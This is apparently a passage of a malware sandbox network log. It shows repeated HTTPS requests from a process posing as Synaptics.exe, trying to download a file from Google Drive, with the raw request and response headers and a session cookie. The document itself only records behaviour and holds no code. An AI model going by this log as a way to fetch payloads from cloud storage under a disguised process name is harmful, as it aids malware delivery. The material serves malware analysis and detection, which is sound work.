                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 50019 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:35 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-25 08:08:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:35 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-NhzHWqmIz7uD5PXw6r6VyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                58 | 192.168.2.4 | 50020 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:08:35 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:35 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-26S-gQH1IAaevC95WvCLgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                59 | 192.168.2.4 | 50036 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:08:39 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:40 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:40 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ivWJwAWjrgaYSMGNDnI90Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                60 | 192.168.2.4 | 50037 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:08:39 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:40 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:40 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-a_0xIM_HucWZEpCyu1_mHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                61 | 192.168.2.4 | 50055 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:08:43 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:44 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:43 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-5LmfoLRsGgCGmFXEMtpHSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                62 | 192.168.2.4 | 50056 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:08:43 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:44 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:43 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-REUwgfU2stAOlyBDwr_eag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                63 | 192.168.2.4 | 50075 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:08:47 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:48 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:47 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-BKzO9ne4KvcowyTQbeZFyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                64 | 192.168.2.4 | 50076 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:08:47 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:48 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:47 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-_thgLo3_GE2AIVhtQayU1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                65 | 192.168.2.4 | 50085 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:08:49 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:50 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:50 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-mKejcf9Sx9gGuYzWQ50kXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                66 | 192.168.2.4 | 50084 | 142.250.181.97 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:08:49 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:50 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC5yLLd63mTyymk8cynW1LXLsb9yDn2Dc5Nfeln7d87xFpjosoPUVcws31na8XjG1abv
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:50 GMT
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-EvRgHQ2sVqNNQgM9jmFWhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                67 | 192.168.2.4 | 50087 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:08:49 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:50 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:50 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
